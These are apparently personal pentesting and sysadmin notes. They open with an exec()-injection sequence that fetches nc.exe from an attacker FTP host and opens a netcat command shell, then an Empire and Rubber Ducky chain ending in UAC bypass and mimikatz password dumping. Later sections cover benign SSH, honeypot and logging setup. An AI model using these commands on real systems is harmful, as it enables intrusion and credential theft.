Create txt file remotely to get nc on victim host

  1. # str$(exec("command.exe /c echo user [username] > ftp.txt"))
  2. # str$(exec("command.exe /c echo pass [password] >> ftp.txt"))
  3. # str$(exec("command.exe /c echo binary >> ftp.txt"))
  4. # str$(exec("command.exe /c echo get nc.exe >> ftp.txt"))
  5. # str$(exec("command.exe /c echo disconnect >> ftp.txt"))
  6. # str$(exec("command.exe /c echo quit >> ftp.txt"))
  7. # str$(exec("command.exe /c ftp -i -n -s:ftp.txt [IP OF ATTACKER PC]"))
  8. # str$(exec("nc -l -p 9999 -e command.exe"))

Empire + Ducky

1. Create listener 
1a. (Empire) > listeners
1b. (Empire: listeners) > set Name Listener01
1c. (Empire: listeners) > execute
1d. (Empire: listeners) > back
2. Create ducky payload
2a. (Empire) > agents
2b. (Empire: agents) > usestager ducky 
2c. (Empire: stager/ducky) > set listener Listener01
2d. (Empire: stager/ducky) > set Outfile /home/ducky.txt
2e. (Empire: stager/ducky) > generate
3. Put payload onto Ducky
3a. Generate the inject.bin file from the code in ducky.txt at the Duck Toolkit site
3b. Copy inject.bin to Ducky
3c. Inject Ducky on victim
4. Try to extract login passwords from victim
4a. Wait for victim to connect back to Empire
4b. (Empire) > agents
4c. (Empire: agents) > list
4d. (Empire: agents) > interact FSDFSGAJ34FGH4
4e. (Empire: FSDFSGAJ34FGH4) > sysinfo
4f. (Empire: FSDFSGAJ34FGH4) > usemodule privesc/bypassuac
4g. (Empire: privesc/bypassuac) > set Listener Listener01
4h. (Empire: privesc/bypassuac) > run
4i. (Empire: privesc/bypassuac) > back * 2
4j. (Empire: agents) > list
4k. (Empire: agents) > interact DSGHFDFSGHJ243J
4l. (Empire: DSGHFDFSGHJ243J) > usemodule credentials/
4m. (Empire: credentials/mimikatz/logonpasswords) > run

If successful, logon passwords are now revealed in cleartext :)

SSH Authentication

  • Generate key pair
    • Linux: # ssh-keygen -t rsa
    • PuTTY: puttygen.exe
  • Load the private key in the PuTTY profile
  • Copy the public key to ~/.ssh/authorized_keys
  • Change permissions on folders
    • chmod 700 ~/.ssh
    • chmod 600 ~/.ssh/authorized_keys
  • Change owner on folder
    • chown -R $USER:$USER ~/.ssh
  • Verify that the folders aren't group/world writable
    • chmod go-w $HOME $HOME/.ssh $HOME/.ssh/authorized_keys
  • Edit sshd_config
    • # nano /etc/ssh/sshd_config
    • Make sure that a line says 'AuthorizedKeysFile %h/.ssh/authorized_keys'
  • Restart SSH
    • # service ssh restart
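A shell check for the permission and ownership steps above, added here as an example (it is not part of the original notes); it assumes GNU stat (Linux) and the paths the notes use ($HOME, $HOME/.ssh, $HOME/.ssh/authorized_keys):

```shell
#!/bin/sh
# Added example, not part of the original notes: audit the ownership and
# permission requirements from the SSH key setup above (700 on ~/.ssh,
# 600 on authorized_keys, no group/world write on $HOME, everything owned
# by the account) before restarting sshd. Assumes GNU stat (Linux).

# last_three MODE -> owner/group/other digits of a stat %a value ("1777" -> "777")
last_three() { m="$1"; printf '%s\n' "${m#"${m%???}"}"; }

# writable_by_others PERM -> success when the group or other digit carries the write bit (2)
writable_by_others() {
    p="$1"
    g="${p#?}"; g="${g%?}"                    # middle digit: group
    o="${p#??}"                               # last digit: other
    case "$g$o" in *[2367]*) return 0 ;; *) return 1 ;; esac
}

# check_ssh_perms HOME_DIR -> 0 when every check passes, 1 otherwise (one finding per line)
check_ssh_perms() {
    home="$1"; ssh="$home/.ssh"; keys="$ssh/authorized_keys"; rc=0
    for p in "$home" "$ssh" "$keys"; do
        [ -e "$p" ] || { echo "MISSING  $p"; rc=1; }
    done
    [ "$rc" -eq 0 ] || return 1

    owner=$(stat -c '%U' "$home")
    for p in "$ssh" "$keys"; do
        [ "$(stat -c '%U' "$p")" = "$owner" ] ||
            { echo "OWNER    $p not owned by $owner (chown -R $owner:$owner $ssh)"; rc=1; }
    done
    # sshd's StrictModes refuses the key when $HOME is group/world writable
    if writable_by_others "$(last_three "$(stat -c '%a' "$home")")"; then
        echo "WRITABLE $home is group/world writable (chmod go-w $home)"; rc=1
    fi
    # the exact modes the notes set
    [ "$(last_three "$(stat -c '%a' "$ssh")")" = 700 ] ||
        { echo "MODE     $ssh should be 700"; rc=1; }
    [ "$(last_three "$(stat -c '%a' "$keys")")" = 600 ] ||
        { echo "MODE     $keys should be 600"; rc=1; }
    [ "$rc" -ne 0 ] || echo "OK       $home passes all checks"
    return "$rc"
}

if [ $# -gt 0 ]; then check_ssh_perms "$1"; fi    # e.g. ./sshperms.sh /home/alice
```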

Docker & MHN

Install docker

# apt-get install

Create & run Docker container for MHN

# docker run -p 10000:10000 -p 80:80 -p 3000:3000 -p 8089:8089 -p 8091:8091 --name mhnsrv --hostname=mhnsrv -t -i ubuntu:14.04 /bin/bash

Install & configure MHN server


set -x

apt-get update 
apt-get upgrade -y 
apt-get install git wget gcc supervisor -y 
cd /opt/ 
git clone 
cd mhn

cat > /etc/supervisor/conf.d/mhntodocker.conf <<EOF



mkdir -p /data/db /var/log/mhn /var/log/supervisor

supervisord &

#Starts the mongod service after installation
echo supervisorctl start mongod >> /opt/mhn/scripts/


supervisorctl restart all 

MHN Configuration

Do you wish to run in Debug mode?: y/n n
Superuser email:
Superuser password:
Superuser password: (again):
Server base url [""]:
Honeymap url [""]:
Mail server address ["localhost"]:
Mail server port [25]:
Use TLS for email?: y/n n
Use SSL for email?: y/n n
Mail server username [""]:
Mail server password [""]:
Mail default sender [""]:
Path for log file ["/var/log/mhn/mhn.log"]:

Create & run a MHN sensor docker container

Container w/ all ports published

# docker run --publish-all=true --name mhnsensor --hostname=mhnsensor -t -i ubuntu:14.04.02 /bin/bash

Container w/ specific ports published

# docker run -p 21:21 -p 2222:22 -p 23:23 -p 25:25 -p 8080:80 -p 110:110 -p 135:135 -p 139:139 -p 443:443 -p 445:445 -p 1433:1433 -p 3306:3306 -p 3389:3389 -p 5060:5060 -p 5061:5061 -p 5900:5900 -p 8081:8081 --name mhnsensor --hostname=mhnsensor -t -i ubuntu:14.04 /bin/bash

Install additional apps

# apt install wget python


# docker ps : show docker processes

# docker logs [container_id]: show docker logs

# docker inspect [container_id]: show docker details

# docker stats [container_id]: show docker stats

# docker port [container_id]: show docker port

# docker attach mhn : interact with mhn docker container

CTRL-p CTRL-q : detach from container & leave it running

# docker start [container_id] : start a container

# docker exec [container_id] supervisord & : start the mhn server container + supervisor app.

More info

Docker User guides

Linux tips :: Various

Custom prompt

$ export PS1="[\d \t \u@\h:\w]$"


Logging #1

Use PuTTY to log commands; this can be handy for documentation.

  • Change Settings… –> Session –> Logging
    • Session logging –> Printable output

[Screenshot: PuTTY Reconfiguration dialog]

Logging #2

Turn on continuous logging

export PROMPT_COMMAND='if [ "$(id -u)" -ne 0 ]; then echo "$(date "+%Y-%m-%d.%H:%M:%S") $(pwd) $(history 1)" >> ~/.logs/bash-history-$(date "+%Y-%m-%d").log; fi'


Then finding a specific command or text string is as easy as

# grep -h nmap ~/.logs/bash-history-2016-06*
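An added example (not from the original notes) for searching the per-day logs the PROMPT_COMMAND above writes: it assumes the line format the hook produces and a current directory without spaces, and it drops the duplicate entries the hook records because it fires at every prompt, including an empty Enter.

```shell
#!/bin/sh
# Added example, not part of the original notes: search the bash-history
# logs written by the PROMPT_COMMAND hook above. The hook runs at every
# prompt, so pressing Enter on an empty line logs the previous command a
# second time; the awk filter drops those repeats by comparing the
# cwd + history-number pair of consecutive matching lines (a heuristic:
# history numbers are only unique within one shell's history).
# Assumed line format (as produced by the hook, cwd without spaces):
#   <YYYY-mm-dd.HH:MM:SS> <cwd> <history-number> <command...>

# search_cmdlog PATTERN LOGFILE... -> matching lines, consecutive repeats removed
search_cmdlog() {
    pattern="$1"; shift
    grep -h -- "$pattern" "$@" | awk '
        { key = $2 FS $3 }                # same directory and history number = same entry
        key != last { print; last = key }'
}

# sample_cmdlog FILE -> writes a constructed log for demonstration (not real data)
sample_cmdlog() {
    cat > "$1" <<'EOF'
2016-06-12.14:03:22 /home/caab   501  nmap -sV 192.0.2.10
2016-06-12.14:03:40 /home/caab   501  nmap -sV 192.0.2.10
2016-06-12.14:05:01 /home/caab/work   502  ls -la
2016-06-12.14:07:13 /home/caab/work   503  nmap -p 80 192.0.2.10
EOF
}

if [ $# -gt 0 ]; then
    search_cmdlog "$@"        # e.g. ./cmdlog.sh nmap ~/.logs/bash-history-2016-06*
fi
```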